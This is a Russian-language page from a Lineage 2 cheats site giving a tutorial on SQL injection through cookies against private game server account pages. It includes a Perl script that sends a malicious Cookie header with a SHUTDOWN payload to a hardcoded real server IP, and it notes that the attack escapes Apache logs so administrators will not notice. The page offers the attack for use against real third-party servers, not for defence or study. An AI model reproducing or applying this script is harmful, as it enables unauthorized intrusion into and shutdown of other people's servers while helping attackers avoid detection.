Купить показы баннера на один месяц за 40 WMZ


Приветствую Вас Гость | RSS
Главная страница | Регистрация | Вход
Ads

Меню сайта

Категории каталога
Мои статьи [8]
Боты lineage2 (читы, баги и т.д) [18]
Баги и секреты для lineage2 java [19]
Секреты и баги lineage2 [15]
Все баги для lineage2 project [46]

Наш опрос
Что важнее в linaeage2

Результаты · Архив опросов

Всего ответов: 61785



Начало » Статьи » Все баги для lineage2 project

Cookies инъекция в lineage2


Если на вашем сервере не получается сделать инъекцию через сайт стандартными методами (будь то инъекция через
страницу регистрации или другие "глючные" скрипты) не отчаивайтесь.

Возможно на сайте сервера есть "личный кабинет", в который вы входите используя свой логин и пароль (как например на
la2.raid.ru или lineageii.ru)
Скорее всего сделать инъекцию напрямую через поля login и password сделать не получится, т.к. администраторы наверняка
сделали фильтр "зловредных символов".
Но у таких личных кабинетов есть своё уязвимое место.

Заметим что одинажды зайдя на сайт, он "запоминает" нас делая запись с нашими логином и паролем в кукисы. Само собой
когда мы в следующий раз зайдем на сайт, браузер автоматически пошлет наш логин и пароль из кукисов.
Вот тут администраторы и чаще всего ошибаются, забыв сделать элементарную проверку кукисов, в расчете что
пользователь не сможет их править, а зря!



Ниже приведен скрипт, который посылает наш кукис серверу, в котором содержится инъекция.

PHP код:
язык - perl, думаю срипт можно будет без труда переписать на более близкий к вам по духу язык)
#!/usr/bin/perl -w
use IO::Socket;
use strict;
use CGI;
my $host = '212.33.232.148';
#здесь host - IP сервера на который посылается куки (в нашем случае это рейд)
my $EOL = "\015\012";
my $NL = "%0D%0A";
my $BLANK = $EOL x 2;
my $remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)");
unless ($remote)
{
die "cannot connect to http daemon on $host\n";
}
$remote->autoflush(1);
print
$remote
"GET /index.php HTTP/1.0".$EOL.
"Cookie: login=\'SHUTDOWN--".
$BLANK;
while (0 and <$remote>)
{
print;
# last if $. == 200;
}
close $remote;

У данной инъекции есть один весомый плюс:
апач не пишет в свои логи кукисы, так что сделав инъекцию через них администраторы далеко не сразу поймут через что их
взломали

Категория: Все баги для lineage2 project | Добавил: Axon (2008-01-20)
Просмотров: 5314 | Рейтинг: 2.6 |



Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Форма входа

Поиск по каталогу

Разделы сайта




  • Разное

  • Статистика

    © 2007